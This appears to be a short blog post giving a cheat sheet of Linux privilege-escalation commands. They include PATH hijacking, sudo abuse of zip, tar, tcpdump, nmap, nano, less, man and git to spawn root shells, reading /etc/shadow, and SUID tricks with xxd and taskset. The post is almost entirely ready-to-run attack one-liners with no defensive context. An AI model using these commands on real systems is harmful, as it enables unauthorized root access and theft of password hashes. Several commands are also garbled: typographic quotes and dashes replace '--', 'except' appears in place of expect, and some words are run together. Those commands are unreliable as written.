Root Privilege

How to Gain Root privilege on Linux System !

Create a new ps file echo /bin/sh > ps
chmod +x ps
Create a new sh file echo /bin/sh > sh
chmod +x sh
set path to:
export PATH=/var/www/backup:${PATH}
run procwatch

Using zip command

$ cd /tmp
sudo zip test.zip test -T –unzip-command=”sh -c /bin/bash”

Using tar command

$ sudo tar cf /dev/null test.tgz –checkpoint=1 –checkpoint-action=exec=/bin/bash
tar cf /dev/null testfile –checkpoint=1 –checkpoint-action=exec=/bin/sh

Using strace command

$ sudo strace -o/dev/null /bin/bash

Using tcpdump command

$ echo $’id\ncat /etc/shadow’ > /tmp/.shell
$ chmod +x /tmp/.shell
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell-Z root

Using nmap command

$ echo “os.execute(‘/bin/sh’)” > /tmp/shell.nse
$ sudo nmap –script=/tmp/shell.nse
OR nmap –interactive !sh

Using scp command

$ sudo scp -S /path/yourscript x y

Using except command

$ sudo except spawn sh then sh

Using nano command

$ sudo nano -S /bin/bash type your command and hit CTRL+T

Using git command

$ sudo git help statustype: !/bin/bash

Using gdb/ftp command

$ sudo ftptype : !/bin/sh

Using Less command
sudo less /etc/hosts
!bash

Using Man command
sudo man /etc/hosts
!bash

Using Git command
sudo git help status
!bash

XXD is a Linux command that creates a hex dump of a given file when it has read permissions while SUID bit is enabled :
xxd “/etc/shadow” | xxd -r

Taskset are system binaries file having suid permissions :
taskset 1 /bin/sh -p


export PWD=’;/bin/bash’

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s